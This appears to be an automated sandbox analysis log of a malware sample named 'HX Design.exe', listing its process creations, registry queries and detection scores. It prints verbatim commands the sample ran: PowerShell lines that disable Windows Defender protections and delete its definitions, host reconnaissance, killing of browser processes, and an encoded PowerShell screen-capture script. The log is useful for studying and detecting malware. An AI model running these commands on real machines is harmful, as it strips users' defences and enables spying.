              Source: HX Design.exe, 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2108964263.00007FFE01462000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2109960714.00007FFE0EB64000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2108069571.00007FFDFBAB5000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2112149178.00007FFE13218000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HX Design.exe
              Source: HX Design.exe, 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs HX Design.exe
              Source: HX Design.exe, 00000001.00000000.1681341710.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs HX Design.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
              Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@153/109@5/4
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20CAFC GetLastError,FormatMessageW,73_2_00007FF77D20CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,73_2_00007FF77D20EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,73_2_00007FF77D23B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D213144 GetDiskFreeSpaceExW,73_2_00007FF77D213144
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\chrome_debug.log
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
              Source: C:\Users\user\Desktop\HX Design.exeMutant created: \Sessions\1\BaseNamedObjects\0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Users\user\Desktop\HX Design.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75082Jump to behavior
              Source: HX Design.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\HX Design.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: HX Design.exeVirustotal: Detection: 50%
              Source: HX Design.exeReversingLabs: Detection: 39%
              Source: HX Design.exeString found in binary or memory: set-addPolicy
              Source: HX Design.exeString found in binary or memory: id-cmc-addExtensions
              Source: HX Design.exeString found in binary or memory: --help
              Source: HX Design.exeString found in binary or memory: --help
              Source: HX Design.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: HX Design.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: HX Design.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: HX Design.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: HX Design.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: HX Design.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: C:\Users\user\Desktop\HX Design.exeFile read: C:\Users\user\Desktop\HX Design.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Users\user\Desktop\HX Design.exe "C:\Users\user\Desktop\HX Design.exe"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIA